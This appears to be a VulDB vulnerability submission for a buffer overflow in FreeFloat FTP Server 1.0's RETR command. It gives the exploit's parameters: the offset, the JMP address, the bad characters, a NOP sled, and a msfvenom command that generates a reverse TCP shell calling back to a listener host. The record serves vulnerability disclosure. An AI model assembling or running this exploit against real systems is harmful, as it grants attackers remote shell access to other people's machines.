| Field | Value |
|---|---|
| Title | FreeFloat FTP Server 1.0 Buffer Overflow |
| Description | This vulnerability is found in the `RETR` command of Freefloat FTP Server 1.0. The `RETR` command is normally used to download a file from the server. However, when a `RETR` request containing 246 bytes of offset data is sent, the EIP (Extended Instruction Pointer) is overwritten.<br>Once the 4 bytes of the EIP are reached, they are overwritten with the address of a JMP instruction, `\x74\xe3\x2f\xd9`.<br>After identifying a suitable JMP address, the bad characters were determined to be `\x00`, `\x0a`, and `\x0d`. These characters had to be excluded from the shellcode to avoid corrupting the payload.<br>With the buffer structure defined, a shellcode generated with Metasploit's msfvenom tool was appended, using the following command:<br>`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.176.136 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl`<br>Note: A NOP sled of 20 bytes of `0x90` (NOP instructions) was placed before the shellcode to ensure proper alignment and stability during execution. NOPs (No Operation instructions) act as a buffer zone, increasing the chance that the execution flow safely reaches the shellcode. This is a common technique in buffer overflow exploits.<br>For the reverse shell to work, Netcat must be running in listening mode on port 4444. Once the exploit is executed successfully, the shellcode initiates a reverse connection, granting remote access to the vulnerable machine.<br>The exploit was tested in an environment running.<br>A version of this exploit written in Perl is available at the following GitHub address: |
| Source | https://github.com/r3ng4f/FreeFloat_1/blob/main/01-exploit.txt |
| User | r3ng4f (UID 73285) |
| Submitted | 2025-05-27 14:47 (1 year ago) |
| Moderation | 2025-05-29 12:02 (2 days later) |
| Status | Accepted |
| VulDB Entry | 310503 [FreeFloat FTP Server 1.0 RETR Command Memory Corruption] |
| Points | 20 |